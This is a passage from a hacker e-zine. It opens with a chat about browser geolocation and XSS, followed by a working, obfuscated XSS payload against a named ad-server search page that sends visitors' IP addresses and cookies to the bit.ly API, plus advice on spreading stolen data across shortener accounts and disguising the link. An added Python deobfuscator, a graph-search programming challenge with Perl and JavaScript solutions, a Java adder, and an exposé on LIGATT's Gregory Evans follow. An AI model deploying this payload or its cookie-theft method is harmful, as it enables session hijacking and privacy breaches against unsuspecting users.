sends a list of all the access points and macs near youSilks: crazy shitSilks: then you can use those 
macs with google api to triangulate your positionelchupathingy: never tried to use itSilks: crazy how much data your browser sends thoughelchupathingy: yaSilks: would be lol to XSS->triangulated positionSilks: similar shit to what samy didSilks: but without being a fucking toolelchupathingy: hehelchupathingy: well you can get it but ff asks for permission to get the lat,lngSilks: yeahSilks: but if location tracking is enabled it goes throughelchupathingy: true then its fucking simple lolSilks: you're fucking simpleSilks: think only in the past 6 months-year they started asking users tbhelchupathingy: function loc(p) { alert( p ); }navigator.geolocation.getCurrentPosition(loc);elchupathingy: erelchupathingy: function loc(p){alert(p.coords.latitude+","+p.coords.longitude);};navigator.geolocati on.getCurrentPosition(loc);Silks: listening to that song you stole from my cookiesd4rK3r: who is more awesome then i?http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest()%3bx.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue)%3bx.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7bvar+ip+%3d+x.responseText.match(new+RegExp(String.fromCharCode(92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125)))%3bvar+y+%3d+new+XMLHttpRequest()%3by.onreadystatechange+%3d+function()%7bif(y.readyState%3d%3d4)window.location%3dString.fromCharCode(103%2c116%2c116%2c112%2c58%2c47%2c47%2c98%2c105%2c116....d%3by.open(+String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47%2c118%2c51%2c47%2c115%2c104%2c111%2c114%2c116%2c101%2c110%2c63%2c108%2c111%2c103%2c105%2c110%2c
61%2c101%2c108%2c99%2c104%2c117%2c112%2c97%2c116%2c104%2c105%2c110%2c103%2c...57%2c99%2c99%2c57%2c102%2c48%2c98%2c50%2c53%2c50%2c52...c61%2c106%2c115%2c111%2c110%2c38%2c108%2c111%2c110%2c103%2c85%2c114%2c108%2c61%2c104%2c116%2c116%2c112%2c58%2c47%2c47%2c103%2...2c97%2c114%2c99%2c104%2c63%2c113%2c61).concat(ip).concat(document.cookie))%3by.send()%3b%7d%3b%7d%3bx.send()%3b%3c%2fscript%3e

This XSS string is the final product of the above discussion: it grabs the user's IP and cookie and
stores them using the bit.ly method outlined above. The page's own filter escapes quoted strings, so
every string in the payload (the HTTP method, the IP-echo URL, the bit.ly API URL, the regex that
pulls the IP out of the response) is assembled with String.fromCharCode, and the whole thing is
percent-encoded into the q= parameter.

The simple bit.ly API makes this method of cookie grabbing simple and effective. Getting the cookie
information back is a single request to the bit.ly service, and all of the relevant information is
returned in an XML or JSON string. Duplicate entries are effectively nulled by how bit.ly hashes the
long URL to create its shortened ones. Accounts are easily created, and thus the links and the
stored information can be distributed amongst many different bit.ly accounts, which makes it much
harder to find the sole source of the links. A combination with other URL shortening services such
as goo.gl, on.fb.me and tinyurl can make this a very robust method of cookie stealing. The XSS string
above can be tweaked to hide its real intentions and can effectively work against someone that does
not question links sent to them. Note, though, that the bit.ly login and API key ride along inside
the payload, so anyone who decodes the injected script gets the drop account along with it.

A major weakness of this technique is that it relies on JavaScript, so browsers that employ NoScript
will not be affected; utilizing other standard XSS techniques and server-side files could ensure
that if you can't grab both the IP and cookie, you can at least grab an IP. As simple as this
technique may be, there is a lot more potential for further privacy and security breaches if you
can think outside the box.
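Added example, not part of the article: the analyst's side of the trick above. Since the payloads here hide every string behind String.fromCharCode and then percent-encode the whole script into the q= parameter, the first thing to do with one found in a log or a shortener is to undo both layers and list the hosts it talks to. The sample URL below is constructed for this example in the shape of the final payload (the injection host is the one from the chat; the script body is written here, with the same IP-echo and bit.ly API hosts the chat used); it is not the page's string.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches one String.fromCharCode(...) call with a purely numeric argument list,
# which is how the payloads above hide their strings from the target's filter.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]*?)\s*\)")
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?[^\s\"'<>)]*")


def js_string_literal(s):
    """Render s as a double-quoted JS literal so the decoded script is still valid JS."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def decode_fromcharcode(js):
    """Replace every String.fromCharCode(...) call with the string it builds."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return js_string_literal("".join(chr(c) for c in codes))
    return FROMCHARCODE.sub(repl, js)


def deobfuscate_payload(url):
    """Take the full injected URL, pull out the q= parameter (parse_qs already
    percent-decodes and turns '+' into spaces, which the payloads rely on) and
    decode the fromCharCode calls inside it."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return decode_fromcharcode(qs.get("q", [""])[0])


def exfil_endpoints(decoded_js):
    """Hostnames the decoded script talks to: the IP lookup and the drop point."""
    return sorted({urlsplit(u).hostname for u in URL_RE.findall(decoded_js)})


# Constructed sample in the shape of the final payload above (host from the chat,
# the script itself written for this example): fetch the client's IP from an
# IP-echo service, then redirect into a URL-shortener API with the IP appended.
SAMPLE_URL = (
    "http://ads.clicksor.com/newServing/yesupSearch/web.php?q="
    "%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest()%3b"
    "x.open(String.fromCharCode(71%2c69%2c84)%2c"
    "String.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%2c47%2c97%2c112%2c105%2c46"
    "%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue)%3b"
    "x.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7b"
    "var+ip+%3d+x.responseText.match(new+RegExp(String.fromCharCode("
    "92%2c100%2c123%2c49%2c44%2c51%2c125)))%3b"
    "window.location%3dString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%2c47%2c97"
    "%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47)"
    ".concat(ip)%3b%7d%7d%3b"
    "x.send()%3b%3c%2fscript%3e"
)

if __name__ == "__main__":
    decoded = deobfuscate_payload(SAMPLE_URL)
    print(decoded)
    print("endpoints:", exfil_endpoints(decoded))
```

Running it prints the readable script and `['api.bitly.com', 'api.hostip.info']`, which is what you would block or hunt for. The decoder only handles fromCharCode with literal numbers; a payload that computes the codes or splits strings with concat would need a real JS interpreter.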
Not to mention that we think storing data in bit.ly is pretty hilarious.

[==================================================================================================]

-=[ 0x0c Programming Challenge
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

Sorry, no programming challenge this issue.  If you have ideas, don't hesitate to shoot us an email.

--------------------------------------------------------------------------------

Last issue, we asked readers to compare the depth-first search and breadth-first search routing
algorithms against a given graph.

Graph Solution by melte
Language: Perl
--------------------

#!/usr/bin/perl
use strict;
use warnings;

# The graph description is read from the __DATA__ section at the end of the file
my $obj = { points => build_tree(<DATA>) };

# Uncomment for examples given in the article
=pod
for ('C', 'D', 'E')
{
    my $end = breadth_first($obj, 'A', $_);
    my $mid = depth_first($obj, 'A', $_);
    print "A -> $_ : DF=$mid BF=$end\n";
}
exit;
=cut

for my $first (sort { $a cmp $b } keys %{$obj->{points}})
{
    for my $second (sort { $a cmp $b } keys %{$obj->{points}})
    {
        my $df = depth_first($obj, $first, $second);
        my $bf = breadth_first($obj, $first, $second);
        my $message = ($df != -1 && $df < $bf) ? "Depth-First"
                    : ($df > $bf && $bf != -1) ? "Breadth-First"
                    : "Tie";
        print "$first -> $second : DF=$df, BF=$bf : $message\n";
    }
}

# The data structure I'm using is a hashref with letters as keys,
# and an arrayref (as the value) listing its neighbours
sub build_tree
{
    my (@input) = @_;
    my $vertex = {};

    # Not strictly necessary but this + the check below is good for catching typos
    while ($input[0] =~ /(\w+)[,}]/g)
    {
        $vertex->{$1} = [];
    }

    while ($input[1] =~ /\{(\w+)\,(\w+)\}/g)
    {
        defined $vertex->{$1} and defined $vertex->{$2}
            or die "Malformed point [$1,$2]";
        push @{$vertex->{$1}}, $2;
        push @{$vertex->{$2}}, $1;
    }

    $vertex;
}

# Setup the structure and enter recursion
sub depth_first
{
    my ($obj, $start, $end) = @_;
    $obj = { checked => [], points => $obj->{points} };
    $start eq $end and return 0;
    _depth_first($obj, $start, $end);
}

# Check all trees from a starting point
sub _depth_first
{
    my ($obj, $start, $end) = @_;
    defined $obj->{checked} or $obj->{checked} = [];
    push @{$obj->{checked}}, $start;

    for my $neighbour (sort { $a cmp $b } @{$obj->{points}{$start}})
    {
        # We can exclude previously checked items
        grep { $_ eq $neighbour } @{$obj->{checked}} and next;
        push @{$obj->{checked}}, $neighbour;
        $neighbour eq $end and return 1;
        my $counter = _depth_first($obj, $neighbour, $end);
        $counter != -1 and return $counter + 1;
    }

    return -1;
}

# Surely there is a pretty and short recursive way to do this
sub breadth_first
{
    my ($obj, $start, $end) = @_;
    $start eq $end and return 0;
    my $tree = $obj->{points}{$start};
    my $level = 0;
    @$tree = sort { $a cmp $b } @$tree;

    while (1)
    {
        ++$level;
        # This problem could exist with a discontinuous graph as input
        @$tree or return -1;
        grep { $_ eq $end } @$tree and return $level;

        # We don't want to add items and then sort
        # We want to add sorted lists to preserve correct ordering
        my $temp = [];
        for my $item (sort { $a cmp $b } @$tree)
        {
            # Exclude the parent node in this context
            push @$temp, grep { $_ ne $item } @{$obj->{points}{$item}};
        }
        $tree = $temp;
    }
}

# Uncomment for smaller graph from article
=pod
__DATA__
V = {A,B,C,D,E}
E = { {A,B},{A,C},{B,C},{B,D},{B,E},{C,D},{D,E}}
__END__
=cut

__DATA__
V = {A,B,C,D,E,F,G,H}
E = { {A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}

--------------------

$ perl graph.pl
A -> A : DF=0, BF=0 : Tie
A -> B : DF=1, BF=1 : Tie
A -> C : DF=5, BF=2 : Breadth-First
A -> D : DF=4, BF=1 : Breadth-First
A -> E : DF=6, BF=2 : Breadth-First
A -> F : DF=3, BF=1 : Breadth-First
A -> G : DF=2, BF=2 : Tie
A -> H : DF=3, BF=2 : Breadth-First
B -> A : DF=1, BF=1 : Tie
B -> B : DF=0, BF=0 : Tie
B -> C : DF=3, BF=3 : Tie
B -> D : DF=2, BF=2 : Tie
B -> E : DF=4, BF=3 : Breadth-First
B -> F : DF=3, BF=2 : Breadth-First
B -> G : DF=4, BF=1 : Breadth-First
B -> H : DF=5, BF=1 : Breadth-First
C -> A : DF=2, BF=2 : Tie
C -> B : DF=3, BF=3 : Tie
C -> C : DF=0, BF=0 : Tie
C -> D : DF=1, BF=1 : Tie
C -> E : DF=2, BF=1 : Breadth-First
C -> F : DF=5, BF=2 : Breadth-First
C -> G : DF=4, BF=3 : Breadth-First
C -> H : DF=5, BF=4 : Breadth-First
D -> A : DF=1, BF=1 : Tie
D -> B : DF=2, BF=2 : Tie
D -> C : DF=1, BF=1 : Tie
D -> D : DF=0, BF=0 : Tie
D -> E : DF=2, BF=1 : Breadth-First
D -> F : DF=4, BF=1 : Breadth-First
D -> G : DF=3, BF=2 : Breadth-First
D -> H : DF=4, BF=3 : Breadth-First
E -> A : DF=3, BF=2 : Breadth-First
E -> B : DF=4, BF=3 : Breadth-First
E -> C : DF=1, BF=1 : Tie
E -> D : DF=2, BF=1 : Breadth-First
E -> E : DF=0, BF=0 : Tie
E -> F : DF=6, BF=2 : Breadth-First
E -> G : DF=5, BF=3 : Breadth-First
E -> H : DF=6, BF=4 : Breadth-First
F -> A : DF=1, BF=1 : Tie
F -> B : DF=2, BF=2 : Tie
F -> C : DF=3, BF=2 : Breadth-First
F -> D : DF=2, BF=1 : Breadth-First
F -> E : DF=4, BF=2 : Breadth-First
F -> F : DF=0, BF=0 : Tie
F -> G : DF=3, BF=1 : Breadth-First
F -> H : DF=4, BF=2 : Breadth-First
G -> A : DF=2, BF=2 : Tie
G -> B : DF=1, BF=1 : Tie
G -> C : DF=4, BF=3 : Breadth-First
G -> D : DF=3, BF=2 : Breadth-First
G -> E : DF=5, BF=3 : Breadth-First
G -> F : DF=4, BF=1 : Breadth-First
G -> G : DF=0, BF=0 : Tie
G -> H : DF=2, BF=1 : Breadth-First
H -> A : DF=2, BF=2 : Tie
H -> B : DF=1, BF=1 : Tie
H -> C : DF=4, BF=4 : Tie
H -> D : DF=3, BF=3 : Tie
H -> E : DF=5, BF=4 : Breadth-First
H -> F : DF=4, BF=2 : Breadth-First
H -> G : DF=5, BF=1 : Breadth-First
H -> H : DF=0, BF=0 : Tie

Running this script, we can clearly see from the output that breadth-first search wins this
comparison: it never returns a longer path than depth-first search does.  That is by construction.
BFS examines every node one hop away before any node two hops away, so the first time it reaches the
target it has found a shortest path in hops, whereas DFS reports whatever path it stumbles onto
first.  However, BFS is not always the better choice.  A judgment call must be made depending on the
specific scenario.  For instance, massive graphs with a target that is many hops away from the origin
point will more likely be searched depth-first simply due to resource limitations.  Breadth-first
search of a massive graph must hold the entire current frontier in memory (every node at the current
depth, plus the next layer as it is generated), and that frontier grows with each layer until it
exhausts RAM, causing swapping or an out-of-memory crash.  With depth-first search, only the single
"branch" currently being explored, the path back to the origin plus whatever bookkeeping of visited
nodes the graph needs, is stored in memory, requiring much less space.

--------------------

Additionally, as an amendment to issue #3, we missed a solution submitted by Suzaku for the
challenge of writing any one of a number of bit adders.

Ripple-Carry Adder by Suzaku
Language: Java
--------------------

import java.util.Scanner;

class adder
{
    public static void main(String args[])
    {
        int bitS[], obA[], obB[], i, cin = 0, cout = 0;
        String bitA, bitB;
        char a, b;
        Scanner input = new Scanner(System.in);
        obA = new int[100];
        obB = new int[100];
        bitS = new int[100];

        System.out.println("Enter the bit pattern A");
        // Reverse the input so index 0 is the least significant bit and the carry ripples upward
        bitA = new StringBuffer(input.next()).reverse().toString();
        System.out.println("Enter the bit pattern B");
        bitB = new StringBuffer(input.next()).reverse().toString();

        if (bitA.length() == bitB.length())
        {
            System.out.print("Sum = ");
            // One full adder per bit position (this loop body did not survive on the page and is
            // reconstructed here): sum = a XOR b XOR cin, cout = majority(a, b, cin)
            for (i = 0; i < bitA.length(); i++)
            {
                a = bitA.charAt(i);
                b = bitB.charAt(i);
                obA[i] = a - '0';
                obB[i] = b - '0';
                bitS[i] = obA[i] ^ obB[i] ^ cin;
                cout = (obA[i] & obB[i]) | (cin & (obA[i] ^ obB[i]));
                cin = cout;
            }
            // Print the sum most significant bit first
            for (i = bitA.length(); i > 0; i--)
                System.out.print(bitS[i - 1]);
            System.out.print("\nCarry = " + cout);
        }
        else
            System.out.print("Length of A and B should be same");
    }
}
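To make the memory argument in the BFS/DFS discussion above concrete, here is the same comparison in
JavaScript, added here as an example (it is neither melte's solution nor code from the zine).  Both
searches are instrumented: BFS reports the largest size its queue ever reached, DFS the deepest
recursion it needed.  The first graph is the one from the challenge, copied from the V/E lines above;
the second is a constructed complete binary tree of depth 10 with the target at the last leaf, which
is where the difference the text describes shows up.

```javascript
// Added example (not melte's solution, not code from the zine): BFS vs DFS
// on the challenge graph, instrumented to show what each search keeps in memory.

// Challenge graph, copied from the __DATA__ section of the Perl solution.
const CHALLENGE_EDGES = [
  ["A", "B"], ["A", "D"], ["A", "F"], ["B", "G"], ["B", "H"], ["C", "D"],
  ["C", "E"], ["D", "E"], ["D", "F"], ["F", "G"], ["G", "H"],
];

// Undirected adjacency list with sorted neighbour lists, so both searches
// visit nodes in the same alphabetical order the Perl solution uses.
function buildGraph(edges) {
  const g = new Map();
  for (const [u, v] of edges) {
    if (!g.has(u)) g.set(u, []);
    if (!g.has(v)) g.set(v, []);
    g.get(u).push(v);
    g.get(v).push(u);
  }
  for (const nbrs of g.values()) nbrs.sort();
  return g;
}

// Breadth-first with a FIFO queue of [node, depth]. `hops` is the shortest
// path length (BFS meets the target at its minimum depth); `peak` is the
// largest the queue ever got, i.e. the frontier that has to fit in memory.
function bfs(g, start, end) {
  if (start === end) return { hops: 0, peak: 0 };
  const visited = new Set([start]);
  const queue = [[start, 0]];
  let peak = 1;
  while (queue.length > 0) {
    const [node, depth] = queue.shift();
    for (const n of g.get(node)) {
      if (visited.has(n)) continue;
      if (n === end) return { hops: depth + 1, peak };
      visited.add(n);
      queue.push([n, depth + 1]);
    }
    peak = Math.max(peak, queue.length);
  }
  return { hops: -1, peak };
}

// Depth-first by recursion, marking a neighbour visited before descending into
// it (as the Perl does). `hops` is the length of the first path found, which
// need not be the shortest; `peak` is the deepest live stack of frames, i.e.
// the single branch that has to be held in memory.
function dfs(g, start, end) {
  if (start === end) return { hops: 0, peak: 0 };
  const visited = new Set([start]);
  let peak = 0;
  const walk = (node, depth) => {
    peak = Math.max(peak, depth);
    for (const n of g.get(node)) {
      if (visited.has(n)) continue;
      visited.add(n);
      if (n === end) return 1;
      const below = walk(n, depth + 1);
      if (below !== -1) return below + 1;
    }
    return -1;
  };
  return { hops: walk(start, 1), peak };
}

// Every ordered pair, labelled the way melte's script labels them.
function compareAll(g) {
  const nodes = [...g.keys()].sort();
  const rows = [];
  for (const from of nodes) {
    for (const to of nodes) {
      const df = dfs(g, from, to).hops;
      const bf = bfs(g, from, to).hops;
      const winner = (df !== -1 && df < bf) ? "Depth-First"
                   : (df > bf && bf !== -1) ? "Breadth-First" : "Tie";
      rows.push({ from, to, df, bf, winner });
    }
  }
  return rows;
}

// Constructed stress case: a complete b-ary tree. Node i's children are
// b*i+1 .. b*i+b, so the highest index is the deepest, rightmost leaf.
function completeTree(branching, depth) {
  const internal = (branching ** depth - 1) / (branching - 1);
  const total = (branching ** (depth + 1) - 1) / (branching - 1);
  const edges = [];
  for (let i = 0; i < internal; i++) {
    for (let k = 1; k <= branching; k++) edges.push([`n${i}`, `n${branching * i + k}`]);
  }
  return { edges, root: "n0", lastLeaf: `n${total - 1}` };
}

// The challenge table, then the tree: BFS's queue holds hundreds of nodes
// while DFS never needs more than depth + 1 frames.
const challenge = buildGraph(CHALLENGE_EDGES);
for (const r of compareAll(challenge)) {
  console.log(`${r.from} -> ${r.to} : DF=${r.df}, BF=${r.bf} : ${r.winner}`);
}
const tree = completeTree(2, 10);
const tg = buildGraph(tree.edges);
console.log("binary tree, depth 10, BFS:", bfs(tg, tree.root, tree.lastLeaf));
console.log("binary tree, depth 10, DFS:", dfs(tg, tree.root, tree.lastLeaf));
```

Run with node.  The table reproduces melte's numbers (same alphabetical visiting order, same
mark-then-descend rule), so on the 8-node graph the two searches need about the same working
memory and the only visible difference is path length.  On the tree the picture flips: both find the
10-hop path, but the BFS queue holds every node of a level at once (512 at depth 9, and more as the
leaves are generated), while DFS's recursion never exceeds 11 frames even though it walks every leaf
before reaching the target.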
[==================================================================================================]

-=[ 0x0d The Scoop on LIGATT

LIGATT Security International (more commonly known as just LIGATT) is a security company founded and
run by the (in)famous Gregory D. Evans.  Evans is mainly known for his claim of being the "world's
number 1 hacker" and his ability to teach anyone to be the same in 15 minutes through one of his
company's educational courses.  Much controversy surrounds Evans and his company, with allegations of
severe debt, shady marketing schemes, and an overall lack of the security knowledge necessary to
provide consulting services of any capacity.  Attrition.org claims that Evans is currently in debt
of over $9,000,000 USD, and the Better Business Bureau currently lists LIGATT with an 'F' rating.
Evans denies all counts of misdoing and considers himself a wealthy, successful businessman.

In mid-January, Go Null Yourself Zine contacted LIGATT to request an interview with Evans.  After a
few days of conversation with Evans' PR assistant, the interview request was accepted.  The
interview spanned two days (due to phone difficulties) and about 2 hours and 10 minutes of
conversation was recorded.  A detailed look at Evans' past was provided, and many shots were taken
at the people and organizations calling him a fraud.

There are simply too many details from the interview to enumerate here, so we have instead made the
recordings public at http://www.gonullyourself.org/zine/4/ligatt for those who are interested.

After the interview, we contacted Attrition.org to get their take on everything told to us by Evans.
We provided a list of key claims made by Evans, and this is their reply:

  All of this is the best of my memory, or with citation if I have it.

  : Evans lived in Germany in his youth and got in trouble for changing a
  : friend's grades.
  : The father of this friend, who was a lawyer, hired
  : Evans (as a kid) to break into the computers of a competing law firm.

  I think this is partially new. The 'changing grades' claim has been made
  before, but not with the additional details above.

  : In 1994, Evans operated the 4th or 5th largest ISP in the country named
  : Connect America financed by money made from hacking side-jobs. (I am
  : unsure if he meant in America or Germany)

  In the US, in California. Claims of the size are unverified, and I doubt
  they can be. The part about making money from hacking side-jobs is likely
  BS. During this time with Connect America, he was stealing phone lines and
  reselling them. This is basic toll fraud, and what led him to getting
  busted and serving 2 years in prison.

  http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf

  : Evans was friends with Kevin Mitnick in California, and they learned
  : about computers and phreaking together.

  This is a lie. Kevin Mitnick confirmed that while they were on the same
  floor of the LA detention center, they did not share a cell (as previously
  claimed by Evans), did not share any hacking / phreaking information, and
  did not learn from each other. Mitnick described Evans as someone who
  didn't seem to know much about hacking and asked basic questions. You can
  confirm this with a mail to Mitnick, and some of it is covered here:

  http://attrition.org/errata/charlatan/gregory_evans/evans09.html
  http://twitter.com/kevinmitnick/statuses/16428972158
  http://twitter.com/kevinmitnick/statuses/16429370781

  : Evans has 100 employees and has hired people in Pakistan and India.

  This is hard to positively debunk, but I am relatively sure he does not
  have 100 employees currently. He has likely had 100 historically, but has
  a very high turnover rate. His claims of consultants in other countries
  make this basically impossible to verify, especially since he has not
  published financials for 2010 as required by the SEC.
  : The term "number 1 hacker" came from Mr. Morris, the FBI agent that
  : arrested Evans, who described Evans as on the "top 10 list of number 1
  : hackers."

  This is a new claim (re: Morris), but based on my experience with the FBI
  seems absurd. Evans was convicted of toll fraud, not really 'hacking'. At
  that time, the FBI had seen some pretty high end / impressive hacking, and
  what Evans was doing didn't come close.

  : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
  : a $4 million house.

  None of this can be verified so far, and we've tried. Given the apartments
  he has lived in for the last 2 years, as verified by ex-employees, it is
  unlikely he has had any significant money to do this. Based on court
  records we have published, he likely has never actually had 1 million
  dollars, just serious debt, including the ~ 10 million he still owes. Even
  now, he owes serious money not only for the previous crimes, but as a
  result of his business dealings the last few years. We have some of the
  records:

  http://attrition.org/errata/charlatan/gregory_evans/ligatt15/

  A summary of his debt:

  http://attrition.org/errata/charlatan/gregory_evans/evans21.html

  : Evans's book "Laptop Security" sold 150,000 copies.

  We have not heard this claim. However, search Amazon for that title and
  look how many are available new/used, and it is likely false. It's curious
  he is focusing on that book, as all of his previous claims centered around
  the 'No 1 Hacker' book.

  : The material found online in Evans's "No. 1 Hacker" book was not
  : copyrighted and therefore was not legally forbidden to use.

  This is patently false. The material he found online *was* copyrighted,
  even if the work did not explicitly say it was. This is copyright 101.
  There is currently a group of the authors that are still considering
  taking action against him.
  I have personally read mails from half a dozen of these authors that
  confirm they hold the copyright, and that they did NOT give him permission
  or sell it to him (as he claimed in other sources). A mail to Simple Nomad
  of NMRC will confirm this as one of the authors (who will reply and
  confirm, while others will not due to potential legal action).

  : Evans was contracted to set up a CCTV camera network at a county prison
  : while on probation.

  Never heard this claim, but given how prisons work (and two direct family
  members that worked in that system), this is very dubious.

  : Evans has committed "every type of high-tech crime you can ever think of
  : before [he] was 26-years-old."

  Again, his conviction was for basic toll fraud. This doesn't suggest any
  level of skill that would back this claim.

  : In 1998, Evans was interrogated by the authorities regarding a
  : system-wide crash of the SkyTel pager network.

  No way to verify this short of a FOIA request for that case. I have not
  heard this claim before.

  : Every time Evans was caught by the authorities, it was because someone
  : else snitched on him.

  The current court records do not suggest this. They do suggest that Evans
  was a snitch (see Mitnick's presentation last year about the topic). We
  have the docket for his big case online, and there is no mention of a
  snitch.

  http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
  http://attrition.org/errata/charlatan/gregory_evans/ligatt07/

  : "High-tech grand theft" is a new state crime that was formed
  : specifically because of Evans's actions.

  There is no state law that uses those words I bet =) Did he mean Georgia?
  How 'new'? This would be easy to verify unless he further spins the claim.

  : There are plenty more points, but there's just too much stuff to listen
  : to. It's not too bad of a list, anyways.
  As usual, and it isn't just Evans, these types of claims are almost always
  made without any real detail, no verification from HIM, etc. Unfortunately,
  a lot of these are new claims or have new elements we haven't seen.

  : I have also attached an email that Evans forwarded to me that may be of
  : interest to you. Thank you again for your time, and I look forward to
  : your response to these claims.

  Yep, np! If you want to run any other claims by me, feel free. I will be
  offline for about 24 hours starting Thursday as I fly back to the states.

  As for the e-mail, I have read it before actually via Don. It was not
  published on attrition.org because it is irrelevant to Evans' claims.
  Because he offered to buy a web site, doesn't mean any deal was made
  regarding publishing material written by Don. It does not speak to any
  agreement, purchase or transfer of copyright of text included in Evans'
  book. So yes, it wasn't included on our site =)

  As always, showing one thing that is marginally related to a piece of
  another story isn't proof, but it is an essential tool in a con.

  - jericho

The attached email mentioned above can be read here.  Evans forwarded this to us after the interview:

  Sorry we got disconnected. Here is proof that I sent Donald an email asking
  to buy his website 6 months beforehand. Proving that there was no malicious
  intent. This is the stuff that they did not put on Attrition.org. Also if
  you want to finish up just let me know.

  Begin forwarded message:

  > From: "EH-Net-Don"
  > Date: December 17, 2009 12:15:13 PM EST
  > To: "'Gregory Evans'"
  > Subject: [SPAM] RE: Purchase of Ethical Hacker Network
  > Reply-To:
  >
  > Hey Gregory,
  >
  > Thank you very much for your kind words. It’s never a bad thing to have your blood, sweat and
  > tears get recognized in a positive way. Although I’m not sure selling is my desire at the
  > moment, I’m always willing to talk business and make new friends in the industry. Either way,
  > you might be interested in getting the word out about your company and its products and
  > services to a wider ethical hacking community. Maybe we could also chat about advertising on
  > my site and/or supporting my ethical hacking conference, ChicagoCon. How’s that for a reverse
  > pitch? ;-)
  >
  > If you don’t mind me asking, how did you find out about us?
  >
  > Looking forward,
  > Don
  >
  > PS – There’s a typo in your LA address. Guess I can’t stop being an editor. :)
  >
  > Donald C. Donzal, CISSP, MCSE 2003, CEH, Security+ SME
  > The Digital Construction Company
  > 1520 Heidorn Ave.
  > Westchester, IL 60154
  > 708.837.3002 (Cell)
  > Founder & Organizer
  > ChicagoCon
  > Editor-In-Chief
  > The Ethical Hacker Network
  >
  >
  >
  > From: Gregory Evans [mailto:gregoryevans@ligatt.com]
  > Sent: Wednesday, December 16, 2009 11:38 PM
  > To: don@ethicalhacker.net
  > Subject: Purchase of Ethical Hacker Network
  >
  > Hello Donzal,
  >
  > My name is Gregory Evans the CEO of LIGATT Security International (www.ligatt.com). I am very
  > impressed with your website Ethical Hacker Network. I would love to speak to you sometime
  > about purchasing the website and still having you run the site. If you are interested please
  > feel free to contact me at 866-354-4288 Ext. 5673.
  >
  > Have a Blessed Day,
  >
  > Gregory Evans
  > President / CEO
  >
  > 866-354-4288 Ext. 5673
  >
  > Atlanta:
  > 6050 Peachtree Parkway
  > Suite 200
  > Norcross, Ga 30092
  >
  > Los Angeles:
  > 11209 Naitonal Blvd.
  > Suite 178
  > Los Angeles, Ca 90292
  >

  Have a Blessed Day,

  Gregory Evans
  President / CEO

  Ring: 866-354-4288 Ext. 5673
  Look: www.LIGATT.COM
  Follow: www.twitter.com/ligatt
  Post: www.facebook.com/GregoryDEvans

  Atlanta
  6050 Peachtree Parkway
  Suite 200
  Norcross, Ga 30092

As if there wasn't enough drama already, on February 2, a message was broadcast to the Full-
Disclosure mailing list detailing the compromise of Evans' websites and email accounts, leaking
hordes of personal and confidential information.  We, personally, have taken little time to look
through the leak and aren't able to better confirm or deny any claims made by Evans.  There is most
likely much to learn, though, according to Jericho:

  : Thank you very much for providing insight on these claims. Would it be
  : okay to publish this email in the zine? I think it would be interesting
  : to place this side-by-side with the interview.

  Yep, feel free. Also note, that with recent events (Evans' entire mail
  spool being leaked / published), some of these claims may be more
  thoroughly debunked in the coming weeks. As an example, his mail spool
  shows that he did register thecyberwars.com despite repeated claims he had
  nothing to do with it.

  : > : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
  : > : a $4 million house.
  : >
  : > None of this can be verified so far, and we've tried. Given the apartments
  : > he has lived in for the last 2 years, as verified by ex employees, it is

  A recent mail leaked from his spool shows that he could not even rent an
  apartment under his mom's name after they performed due diligence. When
  confronted with it, Evans libels attrition:

  http://pastebin.com/J4JeG2W8

  : > A summary of his debt:
  : >
  : > http://attrition.org/errata/charlatan/gregory_evans/evans21.html

  Updated with another entry since this mail.

Also,

  : Additionally, I found these the other day; you may also find them wildly
  : amusing:
  :
  : http://www.theregister.co.uk/2011/01/31/ligatt_security_subpoena_quashed/

  Already posted on the charlatan page.
  : http://www.escapistmagazine.com/news/view/107413-Computer-Hackers-Getting-Their-Own-Reality-Show

  He claims his life story was bought for a movie, that never materialized.
  As I tweeted the other day:

  Hey @GregoryDEvans or @LIGATT .. any comment on why the last movie deal
  went nowhere? http://in.sys-con.com/node/927014

  If he did get a reality show, why doesn't he name the network / company
  that bought it?

And,

  : "I have to be modest and say that we at LIGATT could not have been able
  : to do this without the help of Chris John Riley, Kris French, Sam Bowne,
  : Elizabeth Summers, Atrrion.org, Crabbybastard.com and all the other
  : people who kept our name relevant. What sealed the deal for us and got
  : the networks to say, 'lets do it' was 'LIGATTleaks'. Again, I have shown
  : that what people may say about you or try to do to you does not stand in
  : the way of my success. Success it the best revenge," says Evans.
  :
  : Thought that was funny.

  Yep, that is his new strategy for the last few weeks, he said the same
  thing in one of his recent video blogs as well.

-=-=-

